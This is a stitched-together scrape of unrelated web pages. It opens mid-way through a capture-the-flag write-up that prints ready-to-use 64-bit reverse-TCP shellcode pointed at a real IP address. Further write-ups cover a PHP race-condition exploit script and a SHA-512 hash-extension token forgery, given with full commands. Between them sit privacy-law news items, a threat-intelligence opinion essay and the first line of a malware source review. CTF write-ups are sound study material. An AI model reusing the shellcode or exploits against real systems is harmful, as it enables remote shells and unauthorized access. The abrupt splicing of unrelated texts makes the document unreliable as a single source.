  ops << create_op(OP_MOV, ((@@rwx_addr + 20) - @@registers) / 4, 8)
  ops << create_op(OP_MOV, ((@@rwx_addr + 24) - @@registers) / 4, 9)

Then I just convert the shellcode into a bunch of bytecode operators / operands, which will be the entirity of the fourth bytecode function (I'm proud to say that this code worked on the first try):

  # Pad the shellcode to the proper length
  shellcode = SHELLCODE
  while((shellcode.length % 26) != 0)
    shellcode += "\xCC"
  end

  # Now we create a new function, which simply stores the actual shellcode.
  # Because this is a known offset, we can copy it to the +rwx memory with
  # a loader
  ops = []

  # Break the shellcode into 26-byte chunks (the size of an operation)
  shellcode.chars.each_slice(26) do |slice|
    # Make the character array into a string
    slice = slice.join

    # Split it into the right proportions
    a, b, c, d = slice.unpack("SQQQ")

    # Add them as a new operation
    ops << create_op(a, b, c, d)
  end

  # Add the operations to a new function (no offset, since we just need to
  # get it stored, not run as bytecode)
  add(s, ops, 16)

And, for good measure, here's my 64-bit connect-back shellcode:

# Port 17476, chosen so I don't have to think about endianness at 7am at night :)
REVERSE_PORT = "\x44\x44"

# 206.220.196.59
REVERSE_ADDR = "\xCE\xDC\xC4\x3B"

# Simple reverse-tcp shellcode I always use
SHELLCODE = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" +
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" +
"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24" +
"\x02" + REVERSE_PORT + "\xc7\x44\x24\x04" + REVERSE_ADDR + "\x48\x89\xe6\x6a\x10" +
"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" +
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" +
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" +
"\x5f\x6a\x3b\x58\x0f\x05"

It's slightly modified from some code I found online. I'm mostly just including it so I can find it again next time I need it. :)

Conclusion

To summarize everything...

There was an off-by-one vulnerability in the verifyBytecode() function. I used that to break out of the sandbox and run unverified bytecode.

That bytecode allowed me to read/write/execute arbitrary memory. I used it to leak the base address of the binary, the base address of the register array (where my reads/writes are relative to), and the address of some +RWX memory.

I copied loader code into that +RWX memory, then ran it. It copied the next bytecode function, as actual machine code, to the +RWX memory.

Then I got a shell.

Hope that was useful!

FTC Releases Report on Internet of Things

On January 27, 2015, the Federal Trade Commission announced the release of a report on the Internet of Things: Privacy and Security in a Connected World (the “Report”). The Report describes the current state of the Internet of Things, analyzes the benefits and risks of its development, applies privacy principles to the Internet of Things and discusses whether legislation is needed to address this burgeoning area. The Report follows a workshop by the FTC on this topic in November 2013.

The first part of the Report acknowledges the explosive growth of the Internet of Things, noting how there will be 25 million Internet-connected devices by the end of 2015 and 50 million such devices by 2020. These devices range from cameras to home automation systems to bracelets.

Next, the Report discusses the benefits and risk from the Internet of Things. The benefits highlight such developments as:

  • insulin pumps and blood pressure cuffs that can track an individual’s vital signs and submit the data to health care providers;
  • smart meters that help homeowners conserve energy; and
  • connected cars that can diagnose problems with the vehicle.

The risks that accompany such connected devices include:

  • an unauthorized person accessing and misusing personal information of the user of the connected device;
  • a hacker infiltrating the network to which the device is connected and wrecking havoc; and
  • safety risks to the individual user, such as a risk of a third party accessing a vehicle while it is being driven and altering the braking system.

The incorporation of privacy principles contained the following recommendations on these critical areas:

  • data security – companies should incorporate “security by design” similar to the concept of “privacy by design” and take additional steps such as encrypting sensitive health information;
    • the concept of “security by design” was emphasized in the FTC’s settlement with TRENDnet, an Internet camera company;
  • data minimization – companies can accomplish this by “mindfully considering data collection and retention policies and engaging in a data minimization exercise;”
  • notice and choice – companies should only be required to notify consumers and offer them a choice for uses of their information that are inconsistent with consumer expectations;
    • companies can obviate notice and choice issues by de-identifying data because there is no need to offer consumers choices regarding data that cannot be traced to them.

With respect to legislation, the FTC “does not believe that the privacy and security risks, though real, need to be addressed” by legislation or regulation at this time. Though it does not advocate legislation, the FTC intends to engage more vigorously in the Internet of Things arena by (1) using its enforcement authority, (2) developing consumer and business education materials, (3) convening multistakeholder groups to discuss important issues, and (4) advocating its recommendations with relevant federal and state government entitles.

In announcing the report, FTC Chairwoman Edith Ramirez stated that “by adopting the best practices [the FTC] laid out, businesses will be better able to provide consumers the protections they want and allow the benefits of the Internet of Things to be fully realized.”

Read the FTC’s report.

Risk-Based Approach – New Thinking for Regulating Privacy

On February 11, 2015, the International Association of Privacy Professionals Australian New Zealand (“iappANZ”) will host a discussion on the risk-based approach to privacy in Sydney, Australia. Richard Thomas, Global Strategy Advisor for the Centre for Information Policy Leadership at Hunton & Williams (the “Centre”), will present the Centre’s contributions to this topic including the outcomes from the workshops held in Paris and Brussels. Other guest speakers include Timothy Pilgrim, Australian Privacy Commissioner; Dr. Elizabeth Coombs, New South Wales Privacy Commissioner; and Olga Ganopolsky, General Counsel of Privacy and Data at Macquarie Group Limited. Together, they will discuss the benefits and challenges of a risk-based approach and the implications for businesses and regulators.

For more information and to register for the event, please visit iappANZ’s website.

Federal Court Grants Partial Summary Judgment to Government in an Action Against Dish Network Alleging Telemarketing Violations

On January 21, 2015, the Federal Trade Commission announced that the U.S. District Court for the Central District of Illinois granted partial summary judgment on December 12, 2014, to the federal government in its action against Dish Network LLC (“Dish”), alleging that Dish violated certain aspects of the Telemarketing Sales Rule (“TSR”) that restrict placing calls to numbers on the National Do-Not-Call Registry and an entity’s internal Do-Not-Call list. The federal government is joined in the action against Dish by four state attorneys general alleging violations of the Telephone Consumer Protection Act and certain state laws related to telemarketing.

The government’s complaint stated that Dish directly telemarketed, and contracted with several “authorized dealers” to telemarket, Dish’s products, which primarily include satellite television programming. The government alleged that Dish, either directly or through its authorized dealers, placed millions of calls to numbers that were on the National Do-Not-Call Registry or on Dish’s internal Do-Not-Call list, both of which constituted violations of the TSR. Among other defenses, Dish argued that it was not responsible for its authorized dealers violations of the TSR because the company’s authorized dealers are independent contractors. The court was not persuaded by Dish’s argument, however, because Dish retained the relevant entities and authorized them to market Dish’s products. Thus, the court granted summary judgment to the plaintiffs with respect to Dish’s liability for the calls placed by certain of Dish’s authorized retailers.

Due to the existence of issues of fact, the court held that it could not grant summary judgment regarding the remedies available to the action’s plaintiffs. In their motion for summary judgment, which alleged 65 million impermissible calls, the federal government and four attorneys general claimed that the resulting civil penalty would be more than $725 billion. Although they acknowledged that “a smaller penalty is appropriate,” they also stated that a substantial award “was justified in light of Dish’s extraordinary culpability” and “poor compliance history.” They further noted that a $1 billion penalty “represents a mere 0.15% of the maximum penalty.”

German DPA Appeals Court Decision on Facebook Fan Pages and Suggests Clarification by ECJ on Data Controllership

On January 14, 2015, the data protection authority of the German federal state of Schleswig-Holstein (“Schleswig DPA”) issued an appeal challenging a September 4, 2014 decision by the Administrative Court of Appeals, which held that companies using Facebook’s fan pages cannot be held responsible for data protection law violations committed by Facebook because the companies do not have any control over the use of the data.

The Schleswig DPA claimed that because companies create the fan pages, they are responsible for the data collected and processed by Facebook through the fan pages for purposes such as behavioral advertising. The Schleswig DPA also alleged that the court failed to (1) examine Facebook´s business model, (2) assess technical details related to the functioning of fan pages, and (3) consider the social use of fan pages. The Schleswig DPA argued that the Court of Appeals is in an appropriate position to rule and review decisions of lower courts only after it addresses the three issues above. In addition, the Schleswig DPA stated that Facebook´s business model violates a number of provisions in the German Telemedia Act, including the sections related to user profiling. The Schleswig DPA also suggested that if the court does not concur with the Schleswig DPA’s interpretation of EU data protection law regarding data controllership on social networking websites, the case should be referred to the European Court of Justice (“ECJ”) for a preliminary ruling. An ECJ preliminary ruling is a decision regarding the interpretation of European Union law at the request of a EU member state court.

ENISA Issues Report on Implementation of Privacy and Data Protection by Design

On January 12, 2015, the European Union Agency for Network and Information Security (“ENISA”) published a report on Privacy and Data Protection by Design – from policy to engineering (the “Report”). The “privacy by design” principle emphasizes the development of privacy protections at the early stages of the product or service development process, rather than at later stages. Although the principle has found its way into some proposed legislation (e.g., the proposed EU General Data Protection Regulation), its concrete implementation remains presently unclear. Hence, the Report aims to promote a discussion on how the principle can be implemented concretely and effectively with the help of engineering methods.

The Report provides an overview of the ways in which businesses have implemented the “privacy by design” principle into their products and services. To this end, the Report reviews existing approaches and strategies to implement privacy by design, and gives a structured overview of twelve important privacy techniques (such as authentication, attribute based credentials, encryption communications, anonymity and pseudonymity, etc.). Further, the Report presents the challenges and limitations of “by-design” principles for privacy and data protection.

The Report concludes with a number of recommendations that address system developers, service providers, data protection authorities (“DPAs”) and policy makers on how to overcome and mitigate these limits. The main recommendations include:

  • Policymakers should support the development of new incentive mechanisms for privacy-friendly services and need to promote them (e.g., the establishment of audit schemes and seals to enable the customer to make informed choices and the establishment of penalties for those who do not care or obstruct privacy-friendly solutions);
  • The research community should further investigate privacy engineering, especially with a multidisciplinary approach;
  • Software developers and the research community should offer tools that enable the intuitive implementation of privacy properties. These tools should integrate freely available and maintained components with open interfaces and application programming interfaces;
  • DPAs should play an important role in providing independent guidance and assessing modules and tools for privacy engineering, such as in the promotion of privacy-enhancing technologies and the implementation of the transparency principle;
  • Legislators should promote privacy and data protection in their norms from the legal European data protection framework; and
  • Standardization bodies should include privacy considerations in the standardization process as part of international standards, and should develop standards for the interoperability of privacy features in order to help users compare the privacy guarantees of different products and services and make compliance checks easier for DPAs.

View the full report.

GitS 2015: aart.php (race condition)

Welcome to my second writeup for Ghost in the Shellcode 2015! This writeup is for the one and only Web level, "aart" (download it). I wanted to do a writeup for this one specifically because, even though the level isn't super exciting, the solution was actually a pretty obscure vulnerability type that you don't generally see in CTFs: a race condition!

But we'll get to that after, first I want to talk about a wrong path that I spent a lot of time on. :)

The wrong path

If you aren't interested in the trial-and-error process, you can skip this section—don't worry, you won't miss anything useful.

I like to think of myself as being pretty good at Web stuff. I mean, it's a large part of my job and career. So when I couldn't immediately find the vulnerability on a small PHP app, I felt like a bit of an idiot.

I immediately noticed a complete lack of cross-site scripting and cross-site request forgery protections, but those don't lead to code execution so I needed something more. I also immediately noticed an auth bypass vulnerability, where the server would tell you the password for a chosen user if you simply try to log in and type the password incorrectly. I also quickly noticed that you could create multiple accounts with the same name! But none of that was ultimately helpful (except the multiple accounts, actually).

Eventually, while scanning code over and over, I noticed this interesting construct in vote.php:

<?php
if($type === "up"){
        $sql = "UPDATE art SET karma=karma+1 where id='$id';";
} elseif($type === "down"){
        $sql = "UPDATE art SET karma=karma-1 where id='$id';";
}

mysqli_query($conn, $sql);
?>

mysqli_query($conn, $sql);

Before that block, $sql wasn't initialized. The block doesn't necessarily initialize it before it's used. That led me to an obvious conclusion: register_globals (aka, "remote administration for Joomla")!

I tried a few things to test it, but because the result of mysqli_query isn't actually used and errors aren't displayed, it was difficult to tell what was happening. I ended up setting up a local version of the challenge on a Debian VM just so I could play around (I find that having a good debug environment is a key to CTF success!)

After getting it going and turning on register_globals, and messing around a bunch, I found a good query I could use:

http://192.168.42.120/vote.php?sql=UPDATE+art+SET+karma=1000000+where+id='1'

That worked on my test app, so I confidently strode to the real app, ran it, and... nothing happened. Rats. Back to the drawing board.

The real vulnerability

So, the goal of the application was to obtain a user account that isn't restricted. When you create an account, it's immediately set to "restricted" by this code in register.php:

<?php
if(isset($_POST['username'])){
        $username = mysqli_real_escape_string($conn, $_POST['username']);
        $password = mysqli_real_escape_string($conn, $_POST['password']);

        $sql = "INSERT into users (username, password) values ('$username', '$password');";
        mysqli_query($conn, $sql);

        $sql = "INSERT into privs (userid, isRestricted) values ((select users.id from users where username='$username'), TRUE);";
        mysqli_query($conn, $sql);
        ?>
        <h2>SUCCESS!</h2>
        <?php
} else {
[...]
}
?>

Then on the login page, it's checked using this code:

<?php
if(isset($_POST['username'])){
        $username = mysqli_real_escape_string($conn, $_POST['username']);

        $sql = "SELECT * from users where username='$username';";
        $result = mysqli_query($conn, $sql);

        $row = $result->fetch_assoc();
        var_dump($_POST);
        var_dump($row);

        if($_POST['username'] === $row['username'] and $_POST['password'] === $row['password']){
                ?>
                <h1>Logged in as <?php echo($username);?></h1>
                <?php

                $uid = $row['id'];
                $sql = "SELECT isRestricted from privs where userid='$uid' and isRestricted=TRUE;";
                $result = mysqli_query($conn, $sql);
                $row = $result->fetch_assoc();
                if($row['isRestricted']){
                        ?>
                        <h2>This is a restricted account</h2>

                        <?php
                }else{
                        ?>
                        <h2><?php include('../key');?></h2>
                        <?php

                }


        ?>
        <h2>SUCCESS!</h2>
        <?php
        }
} else {
[...]
}

My gut reaction for far too long was that it's impossible to bypass that check, because it only selects rows where isRestricted=true!

But after fighting with the register_globals non-starter above, I realized that if there were no matching rows in the privs database, it would return zero results and the check would pass, allowing me access! But how to do that?

I went back to the user creation code in register.php and noticed that the creation code creates the user, then restricts it! There's a lesson to programmers: secure by default.

$sql = "INSERT into users (username, password) values ('$username', '$password');";
mysqli_query($conn, $sql);

$sql = "INSERT into privs (userid, isRestricted) values ((select users.id from users where username='$username'), TRUE);";
mysqli_query($conn, $sql);

That means, if you can create a user account and log in immediately after, before the second query runs, then you can successfully get the key! But I didn't notice that till later, like, today. I actually found another path to exploitation! :)

My exploit

This is where things get a little confusing....

I first noticed there's a similar vulnerability in the code that inserts the account restriction into the user table. There's no logic in the application to prevent the creation of multiple user accounts with the same name! And, if you create multiple accounts with the same name, it looked like only the first account would ever get restricted.

That was my reasoning, anyways (I don't think that's actually true, but that turned out not to matter). However, on login, only the first account is actually retrieved from the database! My thought was, if you could get those two SQL statements to run concurrently, so they run intertwined between two processes, it might just put things in the right order for an exploit!

Sorry if that's confusing to you—that logic is flawed in like every way imaginable, I realized afterwards, but I implemented the code anyways. Here's the main part (you can grab the full exploit here):

require 'httparty'

TARGET = "http://aart.2015.ghostintheshellcode.com/"
#TARGET = "http://192.168.42.120/"

name = "ron" + rand(100000).to_s(16)

fork()

t1 = Thread.new do |t|
  response = (HTTParty.post("#{TARGET}/register.php", :body => { :username => name, :password => name }))
end

t2 = Thread.new do |t|
  response = (HTTParty.post("#{TARGET}/register.php", :body => { :username => name, :password => name }))
end

I ran that against my test host and checked the database. Instead of failing miserably, like it by all rights should have, it somehow caused the second query—the INSERT into privs code— to fail entirely! I attempted to log in as the new user, and it gave me the key on my test server.

Honestly, I have no idea why that worked. If I ran it multiple times, it worked somewhere between 1/2 and 1/4 of the time. Not bad, for a race condition! It must have caused a silent SQL error or something, I'm not entirely sure.

Anyway, I then I tried running it against the real service about 100 times, with no luck. I tried running one instance and a bunch in parallel. No deal. Hmm! From my home DSL connection, it was slowwwwww, so I reasoned that maybe there's just too much lag.

To fix that, I copied the exploit to my server, which has high bandwidth (thanks to SkullSpace for letting me keep my gear there :) ) and ran the same exploit, which worked on the first try! That was it, I had the flag.

Conclusion

I'm not entirely sure why my exploit worked, but it worked great (assuming decent latency)!

I realize this challenge (and story) aren't super exciting, but I like that the vulnerability was due to a race condition. Something nice and obscure, that we hear about and occasionally fix, but almost never exploits. Props to the GitS team for creating the challenge!

And also, if anybody can see what I'm missing, please drop me an email ron @ skullsecurity.net) and I'll update this blog. I approve all non-spam comments, eventually, but I don't get notifications for them at the moment.

GitS 2015: knockers.py (hash extension vulnerability)

As many of you know, last weekend was Ghost in the Shellcode 2015! There were plenty of fun challenges, and as always I had a great time competing! This will be my first of four writeups, and will be pretty simple (since it simply required me to use a tool that already exists (and that I wrote :) ))

The level was called "knockers". It's a simple python script that listens on an IPv6 UDP port and, if it gets an appropriately signed request, opens one or more other ports. The specific challenge gave you a signed token to open port 80, and challenged you to open up port 7175. The service itself listened on port 8008 ("BOOB", to go with the "knockers" name :) ).

You can download the original level here (Python).

The vulnerability

To track down the vulnerability, let's have a look at the signature algorithm:

def generate_token(h, k, *pl):
        m = struct.pack('!'+'H'*len(pl), *pl)
        mac = h(k+m).digest()
        return mac + m

In that function, h is a hash function (sha-512, specifically), k is a random 16-byte token, randomly generated, and m is an array of 16-bit representation of the ports that the user wishes to open. So if the user wanted to open port 1 and 2, they'd send "\x00\x01\x00\x02", along with the appropriate token (which the server administrator would have to create/send, see below).

Hmm... it's generating a mac-protected token and string by concatenating strings and hashing them? If you've followed my blog, this might sound very familiar! This is a pure hash extension vulnerability!

I'm not going to re-iterate what a hash extension vulnerability is in great detail—if you're interested, check out the blog I just linked—but the general idea is that if you generate a message in the form of msg + H(secret + msg), the user can arbitrarily extend the message and generate a new signature! That means if we have access to any port, we have access to every port!

Let's see how!

Generating a legit token

To use the python script linked above, first run 'setup':

$ python ./knockers.py setup
wrote new secret.txt

Which generates a new secret. The secret is just a 16-byte random string that's stored on the server. We don't really need to know what the secret is, but for the curious, if you want to follow along and verify your numbers against mine, it's:

$ cat secret.txt
2b396fb91a76307ce31ef7236e7fd3df

Now we use the tool (on the same host as the secret.txt file) to generate a token that allows access on port 80:

$ python ./knockers.py newtoken 80
83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050

Notice the first 512 bits (64 bytes) is the signature—which is logical, since it's sha512—and the last 16 bits (2 bytes) are 0050, which is the hex representation of 80. We'll split those apart later, when we run hash_extender, but for now let's make sure the token actually works first!

We start the server:

$ python ./knockers.py serve

And in another window, or on another host if you prefer, send the generated token:

$ python ./knockers.py knock localhost 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050

In the original window, you'll see that it was successful:

$ python ./knockers.py serve
Client: ::1 len 66
allowing host ::1 on port 80

Now, let's figure out how to create a token for port 7175!

Generating an illegit (non-legit?) token

So this is actually the easiest part. It turns out that the awesome guy who wrote hash_extender (just kidding, he's not awesome) built in everything you needed for this attack!

Download and compile hash_extender if needed (definitely works on Linux, but I haven't tested on any other platforms—testers are welcome!), and run it with no arguments to get the help dump. You need to pass in the original data (that's "\x00\x80"), the data you want to append (7175 => "\x1c\x07"), the original signature, and the length of the secret (which is 16 bytes). You also need to pass in the types for each of the parameters ("hex") in case the defaults don't match (in this case, they don't—the appended data is assumed to be raw).

All said and done, here's the command:

./hash_extender --data-format hex --data 0050 \
  --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 \
  --append "1c07" --append-format hex \
  -l 16

You can pass in the algorithm and the desired output format as well, if we don't, it'll just output in every 512-bit-sized hash type. The output defaults to hex, so we're happy with that.

$ ./hash_extender --data-format hex --data 0050 --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 --append "1c07" --append-format hex -l 16
Type: sha512
Secret length: 16
New signature: 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894
New string: 005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

Type: whirlpool
Secret length: 16
New signature: f4440caa0da933ed497b3af8088cb78c49374853773435321c7f03730386513912fb7b165121c9d5fb0cb2b8a5958176c4abec35034c2041315bf064de26a659
New string: 0050800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

Ignoring the whirlpool token, since that's the wrong algorithm, we now have a new signature and a new string. We can just concatenate them together and use the built-in client to use them:

$ python ./knockers.py knock localhost 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

And checking our server, we see a ton of output, including successfully opening port 7175:

$ python ./knockers.py serve
Client: ::1 len 66
allowing host ::1 on port 80
Client: ::1 len 178
allowing host ::1 on port 80
allowing host ::1 on port 32768
allowing host ::1 on port 0
allowing host ::1 on port 0
[...repeated like 100 times...]
allowing host ::1 on port 0
allowing host ::1 on port 0
allowing host ::1 on port 144
allowing host ::1 on port 7175

And that's it! At that point, you can visit http://knockers.2015.ghostintheshellcode.com:7175 and get the key.

Conclusion

This is a pure hash extension vulnerability, which required no special preparation—the hash_extender tool, as written, was perfect for the job!

My favourite part of that is looking at my traffic graph on github:

It makes me so happy when people use my tool, it really does!

Proposed Indiana Law Would Raise Bar for Security and Privacy Requirements

Indiana Attorney General Greg Zoeller has prepared a new bill that, although styled a “security breach” bill, would impose substantial new privacy obligations on companies holding the personal data of Indiana residents. Introduced by Indiana Senator James Merritt (R-Indianapolis) on January 12, 2015, SB413 would make a number of changes to existing Indiana law. For example, it would amend the existing Indiana breach notification law to apply to all data users, rather than owners of data bases. The bill also would expand Indiana’s breach notification law to eliminate the requirement that the breached data be computerized for notices to be required.

Most significantly, SB413 would require data users to implement and maintain “reasonable procedures” that prohibit them from “retaining personal information beyond what is necessary for business purposes or compliance with applicable law” and “using personal information for purposes beyond those authorized by law or by the individual to whom the personal information relates.” These requirements are a substantial change from most existing U.S. privacy laws, and designing and implementing the necessary procedures could be a challenge for many companies.

Failure to comply with the bill’s requirements would constitute a deceptive act under state consumer protection law. While only the attorney general may bring an enforcement action, if a court determines that the violation was “done knowingly,” penalties include a fine of $50 for each affected Indiana resident, with a minimum fine of at least $5,000 and maximum fine of $150,000 per deceptive act.

The cap likely will be challenged as being too low during hearings on the bill. In any event, the fines imposed under this new section are cumulative with those available under any other state or federal law, rule or regulation.

SB413 also would require data users to have online privacy policies, and it specifies that that those policies must include information as to:

  • whether personal information is collected through the data user’s Internet website;
  • the categories of personal information collected through the data user’s Internet website, if applicable;
  • whether the data user sells, shares or transfers personal information to third parties; and
  • if applicable, whether the data user obtains the express consent of an individual to whom the personal information relates before selling, sharing or transferring the individual’s personal information to a third party.

The bill would explicitly prohibit data users from making a “misrepresentation to an Indiana resident concerning the data user’s collection, storage, use, sharing, or destruction of personal information,” or from requiring a vendor or contractor to do so.

While the bill may well be amended as it moves through the legislative process before the Indiana Senate adjourns on April 29, 2015, it is widely expected to pass. Assuming it does, it will reflect a further significant evolution in state laws regulating information privacy and security, and will add Indiana to the growing list of states moving ahead of federal law in these areas.

China’s State Administration for Industry and Commerce Publishes Measures Defining Consumer Personal Information

On January 5, 2015, the State Administration for Industry and Commerce of the People’s Republic of China published its Measures for the Punishment of Conduct Infringing the Rights and Interests of Consumers (the “Measures”). The Measures contain a number of provisions defining circumstances or actions under which enterprise operators may be deemed to have infringed the rights or interests of consumers. These provisions are consistent with the basic rules in the currently effective P.R.C. Law on the Protection of Consumer Rights and Interests (“Consumer Protection Law”). The Measures will take effect on March 15, 2015.

Article 11 of the Measures provides a list of actions that enterprise operators may not undertake because they infringe upon the personal information of consumers. In October 2013, we reported on the amendment to the Consumer Protection Law which extended the protections of personal information to consumer personal information. The list provided in Article 11 of the Measures is similar in concept to the amendment to the Consumer Protection Law.

Although the list itself does not contain any surprises, Article 11 is nevertheless potentially an important development because it provides a definition of “consumer personal information.” (The amendment to the Consumer Protection Law omitted a definition of this term.) According to Article 11, “consumer personal information” refers to “information collected by an enterprise operator during the sale of products or provision of services, that can, singly or in combination with other information, identify a consumer.” Article 11 also provides a list of specific examples of “consumer personal information,” including a consumer’s “name, gender, occupation, birth date, identification card number, residential address, contact information, income and financial status, health status, and consumer status.”

While this definition applies only in relation to consumer personal information, it is an instructive milestone in the continuing emergence of China’s sector-by-sector patchwork of rules and regulations governing the collection and use of personal information.

Beyond the Buzzwords: Why You Need Threat Intelligence

I dislike buzzwords.

Let me be more precise -- I heavily dislike when a properly useful term is commandeered by the army of marketing people out there in the market space and promptly loses any real meaning. It makes me crazy, as it should make you, when terms devised to speak to some new method, utility, or technology becomes virtually meaningless when everyone uses it to mean everything and nothing all at once. Being in a highly dynamic technical field is hard enough without having to play thesaurus games with the marketing people. They always win anyway.


So when I see things like this post, "7 Security buzzwords that need to be put to rest" on one hand I'm happy someone is out there taking the over-marketing and over-hyping of good terms to task, but on the other hand I'm apprehensive and left wondering whether we've thrown the baby out with the bath-water.

In this case, if you look at slide 8, Threat Intelligence, you have this quote:
"This is a term that has been knocked about in the industry for the last couple of years. It really amounts to little more than a glorified RSS feed once you peel back the covers for most offerings in the market place."

I'm unsure whether the author was going for irony or sarcasm, or has simply never seen a good Threat Intelligence feed before -- but this is just categorically wrong. Publishing this kind of thing is irresponsible, and does a disservice to the reading public who take these words for truth from a journalist.


Hyperbole and Irony

Let's be honest, there are plenty of threat intelligence feeds that match that definition. I can think of a few I'd love to tell you about but non-disclosure agreements make that impractical. Then there are those that provide a tremendous amount of value when they are properly utilized at the proper point in time, by the proper resources.

Take for example a JSON-based feed of validated, known-bad IP addresses from one of the many providers of this type of data. I would hardly call this intelligence, but rather reputational data in the form of a feed. Sure, this is consumed much like you would an RSS feed of news -- except that the intent is typically for automated consumption by tools and technologies that requires very little human intervention.

Is the insinuation here that this type of thing has little value? I would agree that in the grand scheme of intelligence a list of known-bad IP addresses has a very short shelf-life and an complicated utility model which is necessarily more than a binary decision of "good vs. bad" -- but this does not completely destroy its utility to the security organization. Take for example a low-maturity organization who is understaffed, and relies heavily on network-based security devices to protect their assets. Incorporating a known-bad (IP reputation) feed into their currently deployed network security technologies may be more than a simple added layer of security. This may in fact be an evolution, but one that only a lower-level security organization can appreciate.

My point is, don't throw away the potential utility of something like a reputation feed without first considering the context within which it will be useful.


Without Intelligence, We're Blind

I don't know how to make this more clear. After spending a good portion of the last 4 months studying successful and operational security programs I can't imagine a scenario where a security program without the incorporation of threat intelligence is even viable. I'm sorry to report that without a threat-intelligence focused strategy, we're left deploying the same old predictable patterns of network security, antivirus/endpoint and other static defenses which our enemies are well attuned to and can avoid without putting much thought into it.

While I agree, the marketing organizations in the big vendors (and small, to be fair) have all but ruined the reputation of the phrase threat intelligence I dare you to run a successful security program without understanding your threats and adversaries, and be successful at efficient detection and response. Won't happen.

I guess I'm biased since I've spent so much time researching this topic that I'm now what you may consider a true believer. I can sleep well knowing that thorough (and ongoing) research into successful security programs which incorporate threat intelligence leads me to conclude that threat intelligence is essential to an effective and focused enterprise security program. I'm still not an expert, but at least I've seen it both succeed and fail and can tell the difference.


So why the hate? Let's ideate

I get it, security people are experiencing fatigue from buzzwords and terms taken over by marketing people which makes our ears bleed every time someone starts making less than no sense. I get it, I really do. But let's not throw away the baby in the bathwater. Let's not dismiss something that has the potential to transform our security programs into something relevant to today's threats because we're sick of hearing talking heads mis-use and abuse the term.

I also get that when terms are over-hyped and misused it does everyone an injustice. Is an IP reputation list threat intelligence? I wouldn't call it that...it's just data. There are hallmarks of threat intelligence that make it useful and much more than just a buzzword:

  1. it's actionable
  2. it's complete
  3. it's meaningful
Once you have these characteristics for your threat intelligence "feed" then you have significantly more than just an RSS feed. You have something that can act as a catalyst for your security program stuck in the 90's. Let's not let our pull to be snarky get the best of us, and throw away a perfectly legitimate term. Instead, let's take those who mis-use and abuse the term and point them out and call them out for their disservice to our mission.

French Data Protection Authority Issues New Referential Regarding Seals on Data Privacy Governance Procedures

On January 13, 2015, the French Data Protection Authority (the “CNIL”) published a Referential (the “Referential”) that specifies the requirements for organizations with a data protection officer (“DPO”) in France to obtain a seal for their data privacy governance procedures.

According to the CNIL, “governance of personal data” (also called “governance of IT and Civil Liberties”) includes all the measures, rules and best practices that allow private and public organizations to manage personal data in compliance with data protection principles. The goal of the Referential is to assist organizations that have appointed a DPO in France to (1) implement these measures, rules and best practices; and (2) improve accountability.

The Referential includes 25 requirements that apply cumulatively and are divided into three categories.

1. Internal Organization Related to Data Protection

This category relates to the organization’s data privacy policies and DPO, and includes requirements:

  • To have an internal privacy policy that defines the role and responsibility of each actor involved in the implementation of data processing operations. The internal privacy policy explains how the organization protects personal data and contains the organization’s primary data protection principles.
  • To have an outward-facing privacy policy in French. This policy informs the relevant external individuals (such as customers and vendors) about the processing of their personal data.
  • That the DPO be appointed for all data processing operations within the organization.
  • That the DPO report directly to a member of the executive board, have attended all of the CNIL’s training sessions on basic data protection principles, data security and HR issues, and have appropriate means (including an annual budget) to fulfil his or her duties.
  • That the DPO create a comprehensive register of all processing operations implemented by the organization that contains significantly more information than the information currently provided by the DPO in its register (e.g., how any consent was obtained, the use of cookies, etc.).

2. Method of Verifying that Data Processing Operations Comply with Data Protection Law

This category includes the requirements to (1) conduct data security risk assessments, (2) implement appropriate data security measures to address the risks identified, and (3) conduct periodic audits (internal or external) to ensure that the processing operations that pose the highest risk are compliant with law.

3. Assessment of the Management of Data Subjects’ Complaints and Data Incidents

This category includes the requirements to have specific procedures to handle data subjects’ requests and manage data security breaches. The procedure for data security breaches must cover or include (1) the detection of breaches; (2) that information concerning the breach be conveyed to the DPO in less than 24 hours of detecting the breach; (3) a determination of the nature of the breach; (4) that the DPO formulate recommendations and send those recommendations to the data controller; (5) the data controller’s action plan; and (6) the implementation of corrective actions and the DPO’s advice about the implementation, as well as a revision of the previous risk analysis, if appropriate. In addition, the individuals affected by the data security breach must be notified of unauthorized access to their data by a third party in less than 72 hours.

According to the CNIL, compliance with the requirements in the Referential will allow companies to prepare for the accountability obligations that will be introduced by the proposed EU General Data Protection Regulation. In this respect, the Referential confirms that the DPO is the strategic cornerstone of accountability and data privacy compliance.

Alina ‘sparks’ source code review

I got on my hands recently the source code of Alina "sparks", the main 'improvement' that everyone is talking about and make the price of this malware rise is the rootkit feature.
